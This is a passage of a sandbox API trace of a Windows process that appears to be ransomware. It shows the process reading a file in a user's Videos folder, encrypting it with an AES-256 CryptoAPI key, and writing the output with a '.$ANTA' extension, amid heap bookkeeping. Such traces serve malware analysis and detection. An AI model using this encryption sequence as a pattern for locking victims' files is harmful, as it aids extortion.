hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0096.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0096.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\-frmf8je.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0096.406] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0096.406] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xcc1f, lpOverlapped=0x0) returned 1 [0096.407] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0096.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0096.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcc1f) returned 0x4516010 [0096.412] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0096.413] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0096.413] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0096.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fe8 [0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0096.414] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0096.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0096.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0096.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0096.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca268 [0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca268, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.416] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xcc1f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xcc20) returned 1 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.416] CharLowerBuffW (in: lpsz="byte[52257]", cchLength=0xb | out: lpsz="byte[52257]") returned 0xb [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0096.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0096.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0096.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0096.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0096.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0096.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca6b8 [0096.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca6b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.420] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453c488*, pdwDataLen=0x144e790*=0xcc1f, dwBufLen=0xcc20 | out: pbData=0x453c488*, pdwDataLen=0x144e790*=0xcc20) returned 1 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0096.420] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.421] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xcc20, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xcc20, lpOverlapped=0x0) returned 1 [0096.423] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0096.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0096.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0096.424] CryptDestroyKey (hKey=0x41ac600) returned 1 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0096.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.425] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0096.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.426] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.427] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.427] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.427] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0096.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.427] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0096.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f08 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 